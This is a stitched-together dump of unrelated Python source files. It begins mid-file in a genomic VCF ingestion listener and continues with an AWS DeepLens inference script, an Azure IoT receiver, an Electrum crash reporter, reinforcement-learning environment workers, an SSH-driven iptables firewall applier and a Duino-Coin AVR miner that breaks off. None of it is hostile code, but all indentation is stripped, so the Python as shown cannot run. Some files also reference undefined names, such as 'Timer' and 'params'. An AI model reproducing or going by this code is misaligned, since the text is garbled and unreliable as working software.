""" Patches field with value on item uuid """
self.vapp.patch_json('/' + uuid, {field: value})
def patch_ingestion_report(self, report, uuid):
""" Sets the file_ingestion_error field of the given uuid """
if isinstance(report, IngestionReport): # handle normal case
self._patch_value(uuid, 'file_ingestion_error', report.get_errors())
elif isinstance(report, list): # handle when build_ingestion_error_report result is passed
self._patch_value(uuid, 'file_ingestion_error', report)
else:
raise TypeError('Got bad type for ingestion error report: %s' % report)
def set_status(self, uuid, status):
""" Sets the file_ingestion_status of the given uuid """
self._patch_value(uuid, 'file_ingestion_status', status)
@staticmethod
def build_ingestion_error_report(msg):
""" Builds an ingestion error report in case an error is encountered that cannot be recovered from
in VCF ingestion - see file_processed.json for structure definition. """
return [
{
'body': msg,
'row': -1 # this exception may have occurred on a particular row but since it could not be recovered
} # from we assume the msg has sufficient info to work backwards from - Will 4/9/21
]
def run(self):
""" Main process for this class. Runs forever doing ingestion as needed.
HIGH LEVEL LOGIC:
while True:
while there are messages available:
for each message:
download, decompress, ingest, patch file status to "Ingested"
delete processed messages
"""
log.info('Ingestion listener successfully online.')
debuglog("Ingestion listener started.")
messages = [] # This'll get a better value below in each loop iteration. This is just a declaration of intent.
def discard(msg):
self.delete_messages([msg])
# Assuming we didn't get an error trying to remove it,
# it should also get removed from our to-do list.
messages.remove(msg)
while self.should_remain_online():
debuglog("About to get messages.")
messages = self.get_messages() # wait here
debuglog("Got", len(messages), "messages.")
# ingest each VCF file
for message in messages:
debuglog("Message:", message)
body = json.loads(message['Body'])
uuid = body['uuid']
ingestion_type = body.get('ingestion_type', 'vcf') # Older protocol doesn't yet know to expect this
log.info('Ingesting uuid %s' % uuid)
if ingestion_type != 'vcf':
# Let's minimally disrupt things for now. We can refactor this later
# to make all the parts work the same -kmp
if self.INGEST_AS_USER:
try:
debuglog("REQUESTING RESTRICTED PROCESSING:", uuid)
process_submission(submission_id=uuid,
ingestion_type=ingestion_type,
# bundles_bucket=submission.bucket,
app=self.vapp.app)
debuglog("RESTRICTED PROCESSING DONE:", uuid)
except Exception as e:
log.error(e)
else:
submission = SubmissionFolio(vapp=self.vapp, ingestion_type=ingestion_type,
submission_id=uuid)
handler = get_ingestion_processor(ingestion_type)
try:
debuglog("HANDLING:", uuid)
handler(submission)
debuglog("HANDLED:", uuid)
except Exception as e:
log.error(e)
# If we suceeded, we don't need to do it again, and if we failed we don't need to fail again.
discard(message)
continue
debuglog("Did NOT process", uuid, "as", ingestion_type)
# locate file meta data
try:
file_meta = self.vapp.get('/' + uuid).follow().json
location = self.vapp.get(file_meta['href']).location
log.info('Got vcf location: %s' % location)
except Exception as e:
log.error('Could not locate uuid: %s with error: %s' % (uuid, e))
continue
# if this file has been ingested (or explicitly disabled), do not do anything with this uuid
if file_meta.get('file_ingestion_status', 'N/A') in [STATUS_INGESTED, STATUS_DISABLED]:
log.error('Skipping ingestion of file %s due to disabled ingestion status' % uuid)
continue
# attempt download with workaround
try:
raw_content = requests.get(location).content
except Exception as e:
log.error('Could not download file uuid: %s with error: %s' % (uuid, e))
continue
# gunzip content, pass to parser, post variants/variant_samples
# patch in progress status
self.set_status(uuid, STATUS_IN_PROGRESS)
# decoded_content = gunzip_content(raw_content)
# debuglog('Got decoded content: %s' % decoded_content[:20])
vcf_type = file_meta.get("variant_type", "SNV")
if vcf_type == "SNV":
# Apply VCF reformat
vcf_to_be_formatted = tempfile.NamedTemporaryFile(suffix='.gz')
vcf_to_be_formatted.write(raw_content)
formatted = tempfile.NamedTemporaryFile()
reformat_args = {
'inputfile': vcf_to_be_formatted.name,
'outputfile': formatted.name,
'verbose': False
}
reformat_vcf(reformat_args)
# Add altcounts by gene
# Note: you cannot pass this file object to vcf.Reader if it's in rb mode
# It's also not guaranteed that it reads utf-8, so pass explicitly
formatted_with_alt_counts = tempfile.NamedTemporaryFile(mode='w+', encoding='utf-8')
alt_counts_args = {
'inputfile': formatted.name,
'outputfile': formatted_with_alt_counts.name
}
add_altcounts(alt_counts_args)
parser = VCFParser(None, VARIANT_SCHEMA, VARIANT_SAMPLE_SCHEMA,
reader=Reader(formatted_with_alt_counts))
variant_builder = VariantBuilder(self.vapp, parser, file_meta['accession'],
project=file_meta['project']['@id'],
institution=file_meta['institution']['@id'])
elif vcf_type == "SV":
# No reformatting necesssary for SV VCF
decoded_content = gunzip_content(raw_content)
debuglog('Got decoded content: %s' % decoded_content[:20])
formatted_vcf = tempfile.NamedTemporaryFile(
mode="w+", encoding="utf-8"
)
formatted_vcf.write(decoded_content)
formatted_vcf.seek(0)
parser = StructuralVariantVCFParser(
None,
STRUCTURAL_VARIANT_SCHEMA,
STRUCTURAL_VARIANT_SAMPLE_SCHEMA,
reader=Reader(formatted_vcf),
)
variant_builder = StructuralVariantBuilder(
self.vapp,
parser,
file_meta["accession"],
project=file_meta["project"]["@id"],
institution=file_meta["institution"]["@id"],
)
try:
success, error = variant_builder.ingest_vcf()
except Exception as e:
# if exception caught here, we encountered an error reading the actual
# VCF - this should not happen but can in certain circumstances. In this
# case we need to patch error status and discard the current message.
log.error('Caught error in VCF processing in ingestion listener: %s' % e)
self.set_status(uuid, STATUS_ERROR)
self.patch_ingestion_report(self.build_ingestion_error_report(msg=e), uuid)
discard(message)
continue
# report results in error_log regardless of status
msg = variant_builder.ingestion_report.brief_summary()
log.error(msg)
if self.update_status is not None and callable(self.update_status):
self.update_status(msg=msg)
# if we had no errors, patch the file status to 'Ingested'
if error > 0:
self.set_status(uuid, STATUS_ERROR)
self.patch_ingestion_report(variant_builder.ingestion_report, uuid)
else:
self.set_status(uuid, STATUS_INGESTED)
discard(message)
# This is just fallback cleanup in case messages weren't cleaned up within the loop.
# In normal operation, they will be.
self.delete_messages(messages)
def run(vapp=None, _queue_manager=None, _update_status=None):
""" Entry-point for the ingestion listener for waitress. """
ingestion_listener = IngestionListener(vapp, _queue_manager=_queue_manager, _update_status=_update_status)
try:
ingestion_listener.run()
except Exception as e:
debuglog(str(e))
raise
class ErrorHandlingThread(threading.Thread):
""" Must be duplicated here so logging is correct. """
def run(self):
# interval = self._kwargs.get('interval', DEFAULT_INTERVAL)
interval = 60 # DB polling can and should be slower
update_status = self._kwargs['_update_status'] # noQA - uses private instance variables of parent class
while True:
try:
self._target(*self._args, **self._kwargs) # noQA - uses private instance variables of parent class
except (psycopg2.OperationalError, elasticsearch.exceptions.ConnectionError) as e:
# Handle database restart
log.warning('Database not there, maybe starting up: %r', e)
update_status(msg=repr(e))
log.debug('sleeping')
time.sleep(interval)
continue
except Exception as e:
# Unfortunately mod_wsgi does not restart immediately
log.exception('Exception in ingestion listener, restarting process at next request: %s' % e)
os.kill(os.getpid(), signal.SIGINT)
break
# Composite Application (for wsgi)
def composite(loader, global_conf, **settings):
""" This is a composite pyramid app, meant to run components of an application
or an application extension. In our case we are running the ingestion listener,
which requires executing a command with application context. This code lives
in encoded top-level as it is a wsgi entry-point. Note that the local deployment
does NOT run the listener this way, but runs the run method through main directly.
This code is heavily based off of the es_index_listener in snovault.
"""
listener = None
# Register before app creation.
@atexit.register
def join_listener():
if listener:
log.debug('joining listening thread')
listener.join()
# Composite app is used so we can load the main app
app_name = settings.get('app', None)
app = loader.get_app(app_name, global_conf=global_conf)
username = settings.get('username', 'IMPORT')
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': username,
}
vapp = VirtualApp(app, environ)
timestamp = datetime.datetime.utcnow().isoformat()
status_holder = {
'status': {
'status': 'starting listener',
'started': timestamp,
'msgs': []
},
}
def update_status(msg=None, **kw):
""" Method passed to run to update "global" status. """
# Setting a value in a dictionary is atomic
status = status_holder['status'].copy()
status.update(**kw) # can hold generic info
if msg is not None:
status['msgs'].append(msg)
status_holder['status'] = status
kwargs = {
'vapp': vapp,
'_update_status': update_status
}
# daemon thread that actually executes `run` method to call /index
listener = ErrorHandlingThread(target=run, name='listener', kwargs=kwargs)
listener.daemon = True
log.debug('WSGI Ingestion Listener Started')
listener.start()
# Register after virtualapp creation.
@atexit.register
def shutdown_listener():
""" Echo a statement at shutdown """
log.debug('shutting down listening thread')
def status_app(environ, start_response):
""" Allows you to get the status of the ingestion "manager". This will be much
more useful once multi-processing is thrown at ingestion.
"""
ignored(environ)
status = '200 OK'
response_headers = [('Content-type', 'application/json')]
start_response(status, response_headers)
return [json.dumps(status_holder['status'])]
return status_app
# Command Application (for waitress)
def main():
""" Entry point for the local deployment. """
parser = argparse.ArgumentParser( # noqa - PyCharm wrongly thinks the formatter_class is specified wrong here.
description='Listen for VCF File uuids to ingest',
epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('--app-name', help='Pyramid app name in configfile')
parser.add_argument('--username', '-u', default='IMPORT', help='Import username')
parser.add_argument('--dry-run', action='store_true', help='Do not post variants, just validate')
parser.add_argument('config_uri', help="path to configfile")
args = parser.parse_args()
app = paster.get_app(args.config_uri, args.app_name)
config = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': args.username,
}
vapp = VirtualApp(app, config)
return run(vapp)
if __name__ == '__main__':
main()
|
atomos_demo.py
|
# coding: utf-8
import sys
import os
sys.path.append(os.getcwd())
from Morphe.Atomos import Atomos
from Morphe.Morphe import Morphe
import asyncio
import time
import threading
import queue
import functools
def get_from_atomos(q):
count = 0
while True:
count += 1
data = q.get()
print("{}: get_from_atomos Got: ".format(count), data)
q = queue.Queue()
main = threading.Thread(target=functools.partial(get_from_atomos, q))
main.start()
print("Main 开启")
t = list()
for i in range(0, 10000):
t.append(i)
# 生成数据源a1
a1 = Atomos([{"time": t[i]} for i in range(0, 1000, 1)], name="List", buffer_size=10000)
# 生成数据源a2,订阅a1,且a2是终端,异步结果同步至q队列
a2 = Atomos(a1, sync_queue=q, name="Atomos", buffer_size=10)
a2.start()
main.join()
|
greengrassHelloWorld.py
|
print("Started Lambda")
import awscam
import mo
import cv2
from datetime import datetime
import json
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
import sys
from threading import Thread
from base64 import b64encode
clients = []
class ResultsServer(WebSocket):
def handleConnected(self):
print(self.address, 'connected')
clients.append(self)
def handleClose(self):
clients.remove(self)
print(self.address, 'closed')
try:
results_server = SimpleWebSocketServer('', 8080, ResultsServer)
t = Thread(target=results_server.serveforever)
t.start()
print("Started websocket server")
except:
print("error", sys.exc_info()[0])
def greengrass_infinite_infer_run():
try:
global clients
input_width = 224
input_height = 224
model_name = "image-classification"
error, model_path = mo.optimize(model_name, input_width, input_height)
if error:
print error
raise Exception(error)
print("Optimized model")
model = awscam.Model(model_path, {"GPU": 1})
print("Loaded model")
model_type = "classification"
labels = ['a','b','c','d','e','f','g','h','i','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','not']
topk = 1
while True:
start = datetime.now()
ret, frame = awscam.getLastFrame()
if ret == False:
raise Exception("Failed to get frame from the stream")
height, width, channels = frame.shape
frame_cropped = frame[0:height, (width-height)/2:width-(width-height)/2]
frame_resize = cv2.resize(frame_cropped, (input_width, input_height))
infer_output = model.doInference(frame_resize)
parsed_results = model.parseResult(model_type, infer_output)
top_k = parsed_results[model_type][0:topk]
ret, jpeg = cv2.imencode(".jpg", frame_resize)
try:
end = datetime.now()
top_k[0]["label"] = labels[top_k[0]["label"]];
top_k[0]["jpeg"] = b64encode(jpeg)
top_k[0]["delay"] = (end - start).microseconds / 1000
msg = json.dumps(top_k[0]) + u''
for client in clients:
client.sendMessage(msg)
except:
print("error", sys.exc_info()[0])
except Exception as e:
print("Lambda failed: " + str(e))
# Asynchronously schedule this function to be run again in 15 seconds
Timer(15, greengrass_infinite_infer_run).start()
# Execute the function above
greengrass_infinite_infer_run()
# This is a dummy handler and will not be invoked
# Instead the code above will be executed in an infinite loop for our example
def function_handler(event, context):
return
|
iot-hub-client-message.py
|
import json
import random
import re
import sys
import threading
import time
from azure.iot.device import IoTHubDeviceClient, Message
AUX_CONNECTION_STRING = sys.argv[1]
AUX_BASE_HEART_RATE = 65
AUX_BASE_BODY_TEMPERATURE = 37.0
AUX_MAXIMUM_BODY_TEMPERATURE = 40.0
#SENSOR DATA WILL HOST SENSOR METRICS
sensor_data = {}
#MESSAGE FOR RECEIVING DATA FROM IoT HUB. THIS METHOD WILL BE CALLED BY THE RECEPTION THREAD
def message_listener(client):
while True:
message = client.receive_message()
print("Message received")
print( " Data: {}".format(message.data.decode("utf-8") ) )
print( " Properties: {}".format(message.custom_properties))
#METHOD FOR ONE METRIC
def get_sensor_temperature():
temperature = AUX_BASE_BODY_TEMPERATURE + (random.random() * random.random() * 5)
return temperature
#METHOD FOR ONE METRIC
def get_sensor_heart_rate():
heart_rate = AUX_BASE_HEART_RATE + (random.random() * random.random() * 15)
return heart_rate
def aux_validate_connection_string():
if not AUX_CONNECTION_STRING.startswith( 'HostName=' ):
print ("ERROR - YOUR IoT HUB CONNECTION STRING IS NOT VALID")
print ("FORMAT - HostName=your_iot_hub_name.azure-devices.net;DeviceId=your_device_name;SharedAccessKey=your_shared_access_key")
sys.exit()
def aux_iothub_client_init():
client = IoTHubDeviceClient.create_from_connection_string(AUX_CONNECTION_STRING)
return client
def iothub_client_telemetry_sample_run():
try:
aux_validate_connection_string()
client = aux_iothub_client_init()
print ( "IoT Hub Message receiver" )
print ( "Press Ctrl-C to exit" )
#ENABLE THE RECEPTION THREAD, DEFINING THE TARGET METHOD
message_listener_thread = threading.Thread(target=message_listener, args=(client,))
message_listener_thread.daemon = True
message_listener_thread.start()
#IT WILL RUN FOREVER UNLESS YOU STOP IT
while True:
time.sleep(1000)
except KeyboardInterrupt:
print ( "IoTHubClient sample stopped" )
if __name__ == '__main__':
iothub_client_telemetry_sample_run()
|
base_crash_reporter.py
|
# Electrum - lightweight Bitcoin client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import subprocess
import sys
import os
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger
class BaseCrashReporter(Logger):
report_server = "https://electrum.crashhub.qtum.site"
config_key = "show_crash_reporter"
issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
CRASH_TITLE = _('Sorry!')
REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
'useful debug information:')
DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
ASK_CONFIRM_SEND = _("Do you want to send this report?")
def __init__(self, exctype, value, tb):
Logger.__init__(self)
self.exc_args = (exctype, value, tb)
def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
if constants.net.GENESIS[-4:] not in ["986c", "4222"] and ".qtum.site" in BaseCrashReporter.report_server:
# Gah! Some kind of altcoin wants to send us crash reports.
raise Exception(_("Missing report URL."))
report = self.get_traceback_info()
report.update(self.get_additional_info())
report = json.dumps(report)
coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
return response
async def do_post(self, proxy, url, data):
async with make_aiohttp_session(proxy) as session:
async with session.post(url, data=data) as resp:
return await resp.text()
def get_traceback_info(self):
exc_string = str(self.exc_args[1])
stack = traceback.extract_tb(self.exc_args[2])
readable_trace = "".join(traceback.format_list(stack))
id = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": self.exc_args[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": id
}
def get_additional_info(self):
args = {
"app_version": ELECTRUM_VERSION,
"python_version": sys.version,
"os": describe_os_version(),
"wallet_type": "unknown",
"locale": locale.getdefaultlocale()[0] or "?",
"description": self.get_user_description()
}
try:
args["wallet_type"] = self.get_wallet_type()
except:
# Maybe the wallet isn't loaded yet
pass
try:
args["app_version"] = self.get_git_version()
except:
# This is probably not running from source
pass
return args
@staticmethod
def get_git_version():
dir = os.path.dirname(os.path.realpath(sys.argv[0]))
version = subprocess.check_output(
['git', 'describe', '--always', '--dirty'], cwd=dir)
return str(version, "utf8").strip()
def get_report_string(self):
info = self.get_additional_info()
info["traceback"] = "".join(traceback.format_exception(*self.exc_args))
return self.issue_template.format(**info)
def get_user_description(self):
raise NotImplementedError
def get_wallet_type(self):
raise NotImplementedError
def trigger_crash():
# note: do not change the type of the exception, the message,
# or the name of this method. All reports generated through this
# method will be grouped together by the crash reporter, and thus
# don't spam the issue tracker.
class TestingException(Exception):
pass
def crash_test():
raise TestingException("triggered crash for testing purposes")
import threading
t = threading.Thread(target=crash_test)
t.start()
|
parallel_environments.py
|
import multiprocessing
import gym
import torch
from multiprocessing import Process, Pipe
from actor_critic.environment_wrapper import EnvironmentWrapper
def worker(connection, stack_size):
env = make_environment(stack_size)
while True:
command, data = connection.recv()
if command == 'step':
state, reward, done = env.step(data)
if done:
state = env.reset()
connection.send((state, reward, done))
elif command == 'reset':
state = env.reset()
connection.send(state)
def make_environment(stack_size):
env = gym.make('CarRacing-v0')
env_wrapper = EnvironmentWrapper(env, stack_size)
return env_wrapper
class ParallelEnvironments:
def __init__(self, stack_size, number_of_processes=multiprocessing.cpu_count()):
self.number_of_processes = number_of_processes
self.stack_size = stack_size
# pairs of connections in duplex connection
self.parents, self.childs = zip(*[Pipe() for _
in range(number_of_processes)])
self.processes = [Process(target=worker, args=(child, self.stack_size,), daemon=True)
for child in self.childs]
for process in self.processes:
process.start()
def step(self, actions):
for action, parent in zip(actions, self.parents):
parent.send(('step', action))
results = [parent.recv() for parent in self.parents]
states, rewards, dones = zip(*results)
return torch.Tensor(states), torch.Tensor(rewards), torch.Tensor(dones)
def reset(self):
for parent in self.parents:
parent.send(('reset', None))
results = [parent.recv() for parent in self.parents]
return torch.Tensor(results)
def get_state_shape(self):
return (self.stack_size, 84, 84)
if __name__ == '__main__':
env = ParallelEnvironments(params.stack_size, number_of_processes=2)
random_env = gym.make('CarRacing-v0')
res = env.reset()
for i in range(1000):
ac = random_env.action_space.sample()
actions = [ac, ac]
results = env.step(actions)
if torch.all(torch.eq(torch.Tensor(results[0][0][0]), torch.Tensor(results[0][1][0]))):
print(i)
# actions = [[0, 0, 0], [0, 0, 0]]
# env.step(actions)
|
apply-firewall.py
|
#!/usr/bin/env python
"""
Apply a "Security Group" to the members of an etcd cluster.
Usage: apply-firewall.py
"""
import os
import re
import string
import argparse
from threading import Thread
import uuid
import colorama
from colorama import Fore, Style
import paramiko
import requests
import sys
import yaml
def get_nodes_from_args(args):
if args.discovery_url is not None:
return get_nodes_from_discovery_url(args.discovery_url)
return get_nodes_from_discovery_url(get_discovery_url_from_user_data())
def get_nodes_from_discovery_url(discovery_url):
try:
nodes = []
json = requests.get(discovery_url).json()
discovery_nodes = json['node']['nodes']
for node in discovery_nodes:
value = node['value']
ip = re.search('([0-9]{1,3}\.){3}[0-9]{1,3}', value).group(0)
nodes.append(ip)
return nodes
except:
raise IOError('Could not load nodes from discovery url ' + discovery_url)
def get_discovery_url_from_user_data():
name = 'linode-user-data.yaml'
log_info('Loading discovery url from ' + name)
try:
current_dir = os.path.dirname(__file__)
user_data_file = file(os.path.abspath(os.path.join(current_dir, name)), 'r')
user_data_yaml = yaml.safe_load(user_data_file)
return user_data_yaml['coreos']['etcd2']['discovery']
except:
raise IOError('Could not load discovery url from ' + name)
def validate_ip_address(ip):
return True if re.match('([0-9]{1,3}\.){3}[0-9]{1,3}', ip) else False
def get_firewall_contents(node_ips, private=False):
rules_template_text = """*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
:DOCKER - [0:0]
:Firewall-INPUT - [0:0]
-A INPUT -j Firewall-INPUT
-A FORWARD -j Firewall-INPUT
-A Firewall-INPUT -i lo -j ACCEPT
-A Firewall-INPUT -p icmp --icmp-type echo-reply -j ACCEPT
-A Firewall-INPUT -p icmp --icmp-type destination-unreachable -j ACCEPT
-A Firewall-INPUT -p icmp --icmp-type time-exceeded -j ACCEPT
# Ping
-A Firewall-INPUT -p icmp --icmp-type echo-request -j ACCEPT
# Accept any established connections
-A Firewall-INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# Enable the traffic between the nodes of the cluster
-A Firewall-INPUT -s $node_ips -j ACCEPT
# Allow connections from docker container
-A Firewall-INPUT -i docker0 -j ACCEPT
# Accept ssh, http, https and git
-A Firewall-INPUT -m conntrack --ctstate NEW -m multiport$multiport_private -p tcp --dports 22,2222,80,443 -j ACCEPT
# Log and drop everything else
-A Firewall-INPUT -j REJECT
COMMIT
"""
multiport_private = ' -s 192.168.0.0/16' if private else ''
rules_template = string.Template(rules_template_text)
return rules_template.substitute(node_ips=string.join(node_ips, ','), multiport_private=multiport_private)
def apply_rules_to_all(host_ips, rules, private_key):
pkey = detect_and_create_private_key(private_key)
threads = []
for ip in host_ips:
t = Thread(target=apply_rules, args=(ip, rules, pkey))
t.setDaemon(False)
t.start()
threads.append(t)
for thread in threads:
thread.join()
def detect_and_create_private_key(private_key):
private_key_text = private_key.read()
private_key.seek(0)
if '-----BEGIN RSA PRIVATE KEY-----' in private_key_text:
return paramiko.RSAKey.from_private_key(private_key)
elif '-----BEGIN DSA PRIVATE KEY-----' in private_key_text:
return paramiko.DSSKey.from_private_key(private_key)
else:
raise ValueError('Invalid private key file ' + private_key.name)
def apply_rules(host_ip, rules, private_key):
# connect to the server via ssh
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host_ip, username='core', allow_agent=False, look_for_keys=False, pkey=private_key)
# copy the rules to the temp directory
temp_file = '/tmp/' + str(uuid.uuid4())
ssh.open_sftp()
sftp = ssh.open_sftp()
sftp.open(temp_file, 'w').write(rules)
# move the rules in to place and enable and run the iptables-restore.service
commands = [
'sudo mv ' + temp_file + ' /var/lib/iptables/rules-save',
'sudo chown root:root /var/lib/iptables/rules-save',
'sudo systemctl enable iptables-restore.service',
'sudo systemctl start iptables-restore.service'
]
for command in commands:
stdin, stdout, stderr = ssh.exec_command(command)
stdout.channel.recv_exit_status()
ssh.close()
log_success('Applied rule to ' + host_ip)
def main():
colorama.init()
parser = argparse.ArgumentParser(description='Apply a "Security Group" to a Deis cluster')
parser.add_argument('--private-key', required=True, type=file, dest='private_key', help='Cluster SSH Private Key')
parser.add_argument('--private', action='store_true', dest='private', help='Only allow access to the cluster from the private network')
parser.add_argument('--discovery-url', dest='discovery_url', help='Etcd discovery url')
parser.add_argument('--hosts', nargs='+', dest='hosts', help='The IP addresses of the hosts to apply rules to')
args = parser.parse_args()
nodes = get_nodes_from_args(args)
hosts = args.hosts if args.hosts is not None else nodes
node_ips = []
for ip in nodes:
if validate_ip_address(ip):
node_ips.append(ip)
else:
log_warning('Invalid IP will not be added to security group: ' + ip)
if not len(node_ips) > 0:
raise ValueError('No valid IP addresses in security group.')
host_ips = []
for ip in hosts:
if validate_ip_address(ip):
host_ips.append(ip)
else:
log_warning('Host has invalid IP address: ' + ip)
if not len(host_ips) > 0:
raise ValueError('No valid host addresses.')
log_info('Generating iptables rules...')
rules = get_firewall_contents(node_ips, args.private)
log_success('Generated rules:')
log_debug(rules)
log_info('Applying rules...')
apply_rules_to_all(host_ips, rules, args.private_key)
log_success('Done!')
def log_debug(message):
print(Style.DIM + Fore.MAGENTA + message + Fore.RESET + Style.RESET_ALL)
def log_info(message):
print(Fore.CYAN + message + Fore.RESET)
def log_warning(message):
print(Fore.YELLOW + message + Fore.RESET)
def log_success(message):
print(Style.BRIGHT + Fore.GREEN + message + Fore.RESET + Style.RESET_ALL)
def log_error(message):
print(Style.BRIGHT + Fore.RED + message + Fore.RESET + Style.RESET_ALL)
if __name__ == "__main__":
try:
main()
except Exception as e:
log_error(e.message)
sys.exit(1)
|
AVR_Miner.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin AVR Miner (v2.2)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2021
##########################################
import socket, threading, time, re, subprocess, configparser, sys, datetime, os, json # Import libraries
from pathlib import Path
from signal import signal, SIGINT
def install(package):
subprocess.check_call([sys.executable, "-m", "pip", "install", package])
os.execl(sys.executable, sys.executable, *sys.argv)
def now():
return datetime.datetime.now()
try: # Check if pyserial is installed
import serial
import serial.tools.list_ports
except:
print(
now().strftime("%H:%M:%S ")
+ 'Pyserial is not installed. Miner will try to install it. If it fails, please manually install "pyserial" python3 package.\nIf you can\'t install it, use the Minimal-PC_Miner.'
)
install("pyserial")
try: # Check if colorama is installed
from colorama import init, Fore, Back, Style
except:
print(
now().strftime("%H:%M:%S ")
+ 'Colorama is not installed. Miner will try to install it. If it fails, please manually install "colorama" python3 package.\nIf you can\'t install it, use the Minimal-PC_Miner.'
)
install("colorama")
try: # Check if requests is installed
import requests
except:
print(
now().strftime("%H:%M:%S ")
+ 'Requests is not installed. Miner will try to install it. If it fails, please manually install "requests" python3 package.\nIf you can\'t install it, use the Minimal-PC_Miner.'
)
install("requests")
try:
from pypresence import Presence
except:
print(
'Pypresence is not installed. Wallet will try to install it. If it fails, please manually install "pypresence" python3 package.'
)
install("pypresence")
# Global variables
minerVersion = "2.2" # Version number
timeout = 30 # Socket timeout
resourcesFolder = "AVRMiner_" + str(minerVersion) + "_resources"
shares = [0, 0]
diff = 0
donatorrunning = False
job = ""
debug = "n"
rigIdentifier = "None"
serveripfile = "https://raw.githubusercontent.com/revoxhere/duino-coin/gh-pages/serverip.txt" # Serverip file
config = configparser.ConfigParser()
donationlevel = 0
hashrate = 0
connectionMessageShown = False
if not os.path.exists(resourcesFolder):
os.mkdir(resourcesFolder) # Create resources folder if it doesn't exist
def debugOutput(text):
if debug == "y":
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S.%f ")
+ "DEBUG: "
+ text
)
def title(title):
if os.name == "nt":
os.system("title " + title)
else:
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def handler(
signal_received, frame
): # If CTRL+C or SIGINT received, send CLOSE request to server in order to exit gracefully.
print(
now().strftime(Style.RESET_ALL + Style.DIM + "\n%H:%M:%S ")
+ Style.BRIGHT
+ Back.GREEN
+ Fore.WHITE
+ " sys0 "
+ Back.RESET
+ Fore.YELLOW
+ " SIGINT detected - Exiting gracefully."
+ Style.NORMAL
+ Fore.WHITE
+ " See you soon!"
)
try:
soc.close()
except:
pass
os._exit(0)
signal(SIGINT, handler) # Enable signal handler
def loadConfig(): # Config loading section
global pool_address, pool_port, username, donationlevel, avrport, debug, requestedDiff, rigIdentifier
if not Path(
str(resourcesFolder) + "/Miner_config.cfg"
).is_file(): # Initial configuration section
print(
Style.BRIGHT
+ "\nDuino-Coin basic configuration tool\nEdit "
+ str(resourcesFolder)
+ "/Miner_config.cfg file later if you want to change it."
)
print(
Style.RESET_ALL
+ "Don't have an Duino-Coin account yet? Use "
+ Fore.YELLOW
+ "Wallet"
+ Fore.WHITE
+ " to register on server.\n"
)
username = input(
Style.RESET_ALL
+ Fore.YELLOW
+ "Enter your Duino-Coin username: "
+ Style.BRIGHT
)
print(
Style.RESET_ALL
+ Fore.YELLOW
+ "Configuration tool has found the following ports:"
)
portlist = serial.tools.list_ports.comports()
for port in portlist:
print(Style.RESET_ALL + Style.BRIGHT + Fore.YELLOW + " " + str(port))
print(
Style.RESET_ALL
+ Fore.YELLOW
+ "If you can't see your board here, make sure the it is properly connected and the program has access to it (admin/sudo rights)."
)
avrport = ""
while True:
avrport += input(
Style.RESET_ALL
+ Fore.YELLOW
+ "Enter your board serial port (e.g. COM1 (Windows) or /dev/ttyUSB1 (Unix)): "
+ Style.BRIGHT
)
confirmation = input(
Style.RESET_ALL
+ Fore.YELLOW
+ "Do you want to add another board? (y/N): "
+ Style.BRIGHT
)
if confirmation == "y" or confirmation == "Y":
avrport += ","
else:
break
requestedDiffSelection = input(
Style.RESET_ALL
+ Fore.YELLOW
+ "Do you want to use a higher difficulty (only for Arduino DUE boards) (y/N): "
+ Style.BRIGHT
)
if requestedDiffSelection == "y" or requestedDiffSelection == "Y":
requestedDiff = "ESP32"
else:
requestedDiff = "AVR"
rigIdentifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ "Do you want to add an identifier (name) to this rig? (y/N) "
+ Style.BRIGHT
)
if rigIdentifier == "y" or rigIdentifier == "Y":
rigIdentifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ "Enter desired rig name: "
+ Style.BRIGHT
)
else:
rigIdentifier = "None"
donationlevel = "0"
if os.name == "nt" or os.name == "posix":
donationlevel = input(
Style.RESET_ALL
+ Fore.YELLOW
